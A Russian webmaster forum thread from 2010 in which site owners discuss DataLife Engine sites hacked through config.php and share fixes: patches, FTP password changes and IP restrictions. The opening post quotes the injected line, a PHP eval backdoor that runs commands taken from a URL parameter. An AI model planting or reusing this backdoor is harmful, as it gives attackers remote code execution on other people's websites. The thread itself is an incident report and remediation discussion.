X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
> dle Взлом сайта в config.php
vasyatko
vasyatko
Topic Starter сообщение 26.12.2010, 2:13; Ответить: vasyatko
Сообщение #1


два сайта поломали на одном 8.0 версия на другом 8.2.  

Открылась белая страница.

Нашёл в config.php

'lang_123' => "",

'lang_1111111' => """",

'lang_123456' => "{${@eval($_GET[cmd])}}",




config.php изменяем права на файл и ставим заплатки




похожая тема.

http://talk.prowebber.ru/index.php?showtopic=3375


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
knaipa
knaipa
сообщение 26.12.2010, 13:14; Ответить: knaipa
Сообщение #2


Что нам теперь делать с этой информацией?


--------------------
Забанен за мошенничество
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
YuRec
YuRec
сообщение 26.12.2010, 13:20; Ответить: YuRec
Сообщение #3


Вот на офф сайт описано как спастись.
_http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
casp
casp
сообщение 26.12.2010, 13:40; Ответить: casp
Сообщение #4


Тоже самое! Очистил и нифига. Вирус всё равно грузиться. Что делать?
(заплатку поставил)

Сообщение отредактировал casp - 26.12.2010, 13:40
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
knaipa
knaipa
сообщение 26.12.2010, 13:43; Ответить: knaipa
Сообщение #5


Сменить пароль на фтп
Разрешить в .ftpaccess доступ только со своего айпишника.


--------------------
Забанен за мошенничество
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
YuRec
YuRec
сообщение 26.12.2010, 13:47; Ответить: YuRec
Сообщение #6


Посмотри в шаблоне, может там какие-то непонятные скрипты добавили
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ukrseo
ukrseo
сообщение 26.12.2010, 13:47; Ответить: ukrseo
Сообщение #7


На форуме уже тем 20 за неделю о взломах и о том что и где спрятано. Юзайте поиск уважаемый ТС.

Сообщение отредактировал ukrseo - 26.12.2010, 13:48


--------------------
клоновод
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
install
install
сообщение 26.12.2010, 13:49; Ответить: install
Сообщение #8


(knaipa @ 26.12.2010, 14:43) *
Разрешить в .ftpaccess доступ

подробнее можно написать?

у меня ссылка с ундер-клик подгружается, каспер ее блочит, заплатки так же ставил


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
casp
casp
сообщение 26.12.2010, 13:53; Ответить: casp
Сообщение #9


Во, install , у меня тоже самое. Каспер блочит какие то левые сайты под загрузку, права ставил, чистил эти lang_11111 всё равно!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
knaipa
knaipa
сообщение 26.12.2010, 13:57; Ответить: knaipa
Сообщение #10


95% всех взломов из-за того, что злоумышленник смог каким-то способом попасть через ftp на сервер и сделать нужное ему дело
поэтому кроме смены пароля нужно ещё и попробовать ограничить доступ по фтп
вот нагуглил немного

Настроек в этом файле может быть большое множество, однако для защиты, нас интересует только один параметр. Прописав эти строки в файле вы закроете полностью доступ от всех!

<Limit ALL>
Deny from all
</Limit>

После написанного выше, никто не сможет зайти на ФТП. Для добавления разрешения к определенному IP надо добавить строку вида

Allow from 127.0.0.1

перед Deny, например:

<Limit ALL>
Allow from 127.0.0.1
Deny from all
</Limit>

Естественно адрес 127.0.0.1 указан для примера. Нужно указать свой сетевой IP. Если же у вас динамический адрес, можно использовать фильтр вида:


ах да, это обычный текстовый файл, ложите его в корне хостинга.
вместо 127.0.0.1 указываете свой айпишник, узнать его можно к примеру тут http://ripe.net/ (справа вверху)


--------------------
Забанен за мошенничество
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
4 чел. читают эту тему (гостей: 4, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Продвижение молодого сайта
30 maxmer 6367 26.3.2024, 21:49
автор: c4p1t4l15t
Открытая тема (нет новых ответов) SEO-текст на главной странице сайта и в категориях
5 boltuk 1354 26.3.2024, 21:43
автор: c4p1t4l15t
Открытая тема (нет новых ответов) Какой % отказов нормален для сайта?
10 Aloof 2544 24.3.2024, 21:45
автор: Liudmila
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыБыстрая индексация страниц сайта и обратных ссылок - 2Index
32 2Index 5828 18.3.2024, 16:33
автор: 2Index
Открытая тема (нет новых ответов) Перенос сайта на CMS Wordpress
8 freeax 4846 10.3.2024, 14:58
автор: freeax


 



RSS Текстовая версия Сейчас: 29.3.2024, 0:43
Дизайн